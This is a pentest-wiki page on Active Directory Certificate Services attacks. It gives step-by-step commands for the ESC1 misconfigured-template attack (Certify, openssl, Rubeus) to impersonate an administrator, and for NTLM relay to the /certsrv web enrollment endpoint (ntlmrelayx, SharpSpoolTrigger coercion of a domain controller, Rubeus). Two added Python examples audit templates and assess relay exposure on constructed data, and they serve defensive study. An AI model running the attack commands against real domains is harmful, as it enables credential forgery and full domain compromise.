# Certificates

## Introduction

Active Directory Certificate Services (AD CS) is a customizable service for issuing and managing digital certificates. These digital certificates can be used for the authentication of computer, user, or device accounts on a network.

## Misconfigured Certificate Templates

This misconfiguration allows any domain user to request a certificate for any other domain user and then use that certificate to authenticate as them.

To check whether any template is vulnerable, run the following command.

> :information_source: If `<DOMAIN>\Domain Users` has enrollment rights, any domain user may request a certificate from this template.

```bash
.\Certify.exe find /vulnerable
```
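What Certify's `/vulnerable` check is looking for can be reproduced offline. The following is an added example for this page, not Certify's own code: it evaluates template objects against the conditions of the "enrollee supplies subject" misconfiguration (low-privileged enrollment rights, `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` set, no manager approval, no authorized signatures required, and an EKU usable for client authentication). The attribute names, flag bits, OIDs and the Certificate-Enrollment right GUID are the real AD CS schema values; the template records are constructed sample data shaped like LDAP objects under `CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,<forest DN>`, so an audit of a real forest would replace them with the results of an LDAP query.

```python
"""Offline audit of AD CS certificate templates for the "enrollee supplies
subject" misconfiguration (added example; not Certify's code).

Template records below are CONSTRUCTED sample data shaped like the LDAP
attributes of pKICertificateTemplate objects.
"""
from dataclasses import dataclass, field

# Flag bits from the msPKI-* attributes (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # in msPKI-Enrollment-Flag (manager approval)

# EKUs that make an issued certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# rightsGuid of the Certificate-Enrollment extended right.
CERTIFICATE_ENROLLMENT_GUID = "0e10c968-78fb-11d2-90d4-00c04f79dc55"

# Low-privileged principals: Authenticated Users, Everyone, and the
# domain-relative RIDs of Domain Users (513) and Domain Computers (515).
LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}
LOW_PRIV_RIDS = {"513", "515"}


def is_low_privileged(sid: str) -> bool:
    """True when the SID is one every domain user or computer holds."""
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


@dataclass
class Template:
    name: str
    name_flag: int                                    # msPKI-Certificate-Name-Flag
    enrollment_flag: int                              # msPKI-Enrollment-Flag
    ra_signature: int                                 # msPKI-RA-Signature
    ekus: list = field(default_factory=list)          # pKIExtendedKeyUsage
    enroll_aces: list = field(default_factory=list)   # allow ACEs as (trustee SID, rightsGuid)


def esc1_checks(t: Template) -> dict:
    """Map each condition to whether the template satisfies it."""
    low_priv_enrollers = [
        sid for sid, guid in t.enroll_aces
        if guid.lower() == CERTIFICATE_ENROLLMENT_GUID and is_low_privileged(sid)
    ]
    return {
        "low-privileged enrollment rights": bool(low_priv_enrollers),
        "enrollee supplies subject": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures required": t.ra_signature == 0,
        "authentication EKU or no EKU": not t.ekus or bool(AUTH_EKUS & set(t.ekus)),
    }


def is_esc1(t: Template) -> bool:
    """All conditions must hold together for the template to be abusable."""
    return all(esc1_checks(t).values())


def audit_templates(templates) -> list:
    """Names of the templates that meet every condition."""
    return [t.name for t in templates if is_esc1(t)]


# CONSTRUCTED sample data: one abusable template and three that each miss one condition.
DOMAIN_USERS = "S-1-5-21-1111-2222-3333-513"
DOMAIN_ADMINS = "S-1-5-21-1111-2222-3333-512"
SAMPLE_TEMPLATES = [
    Template("VulnTemplate", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.2"],
             [(DOMAIN_USERS, CERTIFICATE_ENROLLMENT_GUID)]),
    # Subject built by AD from the requester's account, not supplied by the enrollee.
    Template("User", 0x0, 0x0, 0, ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
             [(DOMAIN_USERS, CERTIFICATE_ENROLLMENT_GUID)]),
    # Server Authentication EKU only, and only Domain Admins can enroll.
    Template("WebServer", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.1"],
             [(DOMAIN_ADMINS, CERTIFICATE_ENROLLMENT_GUID)]),
    # Enrollee supplies the subject, but every request waits for manager approval.
    Template("ApprovedClientAuth", 0x1, CT_FLAG_PEND_ALL_REQUESTS, 0, ["1.3.6.1.5.5.7.3.2"],
             [("S-1-5-11", CERTIFICATE_ENROLLMENT_GUID)]),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        status = "ABUSABLE" if is_esc1(t) else "ok"
        print(f"{t.name:20} {status:9} {esc1_checks(t)}")
```

The per-condition dictionary is what makes the output actionable for a defender: the template stays safe as long as any single condition is broken, so the cheapest fix (requiring manager approval, clearing the enrollee-supplies-subject flag, or removing the broad enrollment ACE) can be chosen per template.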

These are the steps to exploit this vulnerability.

1. Request a certificate for a user with high privileges on the domain, then save the private key and certificate into a file like `cert.pem`.

```bash
.\Certify.exe request /ca:<PREVIOUSLY_OBTAINED_CA> /template:<VULNERABLE_TEMPLATE_NAME> /altname:<USER_TO_IMPERSONATE>
```

2. Convert `cert.pem` into PFX (PKCS#12) format. You will be prompted for an export password, which is needed again in step 4.

```bash
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

3. Base64-encode the certificate to use it with Rubeus.

```bash
cat cert.pfx | base64 -w 0
```

4. Request a TGT using the encoded certificate.

```bash
.\Rubeus.exe asktgt /user:Administrator /nowrap /password:<EXPORTING_PASSWORD> /certificate:<BASE64>
```

## NTLM Relaying to ADCS HTTP Endpoints

Useful when the **CA is running on a web service** that accepts **authentication via NTLM**. In this case you can force a DC to authenticate to an attacker's machine, relay that authentication to the CA to obtain a certificate, and then use the certificate to obtain a TGT.

AD CS supports HTTP enrollment methods and even includes a GUI. This endpoint is usually found at `http[s]://<hostname>/certsrv`.

> You **cannot** relay NTLM authentication back to the originating machine. We therefore wouldn't be able to **relay a DC to a CA if those services were running on the same machine**.
>
> Another good way to abuse this primitive is by gaining access to a machine configured for unconstrained delegation.

These are the steps to exploit this vulnerability.

1. Execute ntlmrelayx on the attacker machine, pointing it at the web CA.

```bash
sudo proxychains ntlmrelayx.py -t https://<ADCS>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
```

2. Force the DC to authenticate against the attacker machine. The certificate will appear in the ntlmrelayx output.

> You can use any of the programs on [Unconstrained Delegation](/active-directory/kerberos.md#unconstrained-delegation).

```bash
.\SharpSpoolTrigger.exe <TARGET_DC> <ATTACKER_MACHINE>
```

3. Use the certificate to obtain a TGT for the DC machine account (from which S4U2Self can then be used).

```bash
.\Rubeus.exe asktgt /user:<HOSTNAME>$ /ptt /certificate:<NTLM_CERTIFICATE>
```
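From the defender's side, the relay path above is closed by disabling NTLM on the web enrollment site, or by requiring HTTPS and enabling Extended Protection for Authentication (EPA) so that a relayed NTLM exchange fails channel binding. The following is an added example for this page, not part of any tool the page describes: it parses the `WWW-Authenticate` challenges returned by a `/certsrv` endpoint and combines them with the site's scheme and IIS `extendedProtection tokenChecking` setting (`None`, `Allow` or `Require`) to report whether the endpoint is still relay-exposed. The HTTP responses are constructed sample data; the helper names are this example's own.

```python
"""Assess an AD CS web enrollment (/certsrv) endpoint for NTLM-relay exposure.

Added example (not part of this page's tooling). Inputs are CONSTRUCTED:
a raw 401 response as the endpoint would return it, whether the site is
reachable only over HTTPS, and the IIS extendedProtection tokenChecking value.
"""
from dataclasses import dataclass


def challenge_schemes(raw_response: str) -> list:
    """Return the authentication schemes named in WWW-Authenticate headers."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    schemes = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "www-authenticate":
            # "Negotiate", "NTLM", "Basic realm=..." -> keep the scheme token only.
            schemes.append(value.strip().split()[0].upper())
    return schemes


@dataclass
class WebEnrollmentSite:
    https_only: bool          # plain-HTTP binding removed / "Require SSL" set
    raw_401_response: str     # response to an unauthenticated GET /certsrv
    epa_token_checking: str   # IIS extendedProtection tokenChecking: None | Allow | Require


def assess(site: WebEnrollmentSite) -> list:
    """Return findings describing why a relayed NTLM logon would still succeed.

    An empty list means the relay path described in the section is closed.
    """
    schemes = challenge_schemes(site.raw_401_response)
    # Negotiate can fall back to NTLM when Kerberos is unavailable, so it counts.
    if not ({"NTLM", "NEGOTIATE"} & set(schemes)):
        return []
    findings = []
    if not site.https_only:
        findings.append("NTLM accepted over plain HTTP: no channel binding is possible")
    if site.epa_token_checking.lower() != "require":
        findings.append("Extended Protection for Authentication not required: "
                        "relay over HTTPS still succeeds")
    return findings


# CONSTRUCTED sample responses.
NTLM_401 = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    "WWW-Authenticate: NTLM\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
BASIC_ONLY_401 = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "WWW-Authenticate: Basic realm=\"certsrv\"\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

EXPOSED_SITE = WebEnrollmentSite(False, NTLM_401, "None")
HARDENED_SITE = WebEnrollmentSite(True, NTLM_401, "Require")
NO_NTLM_SITE = WebEnrollmentSite(False, BASIC_ONLY_401, "None")

if __name__ == "__main__":
    for label, site in [("exposed", EXPOSED_SITE), ("hardened", HARDENED_SITE),
                        ("no NTLM", NO_NTLM_SITE)]:
        print(label, assess(site) or "relay path closed")
```

Removing the HTTP binding alone is not enough: with NTLM still accepted over HTTPS and EPA left at `None` or `Allow`, the relayed authentication is not bound to the TLS channel and the exchange completes, which is why `assess` keeps reporting the missing EPA requirement for such a site.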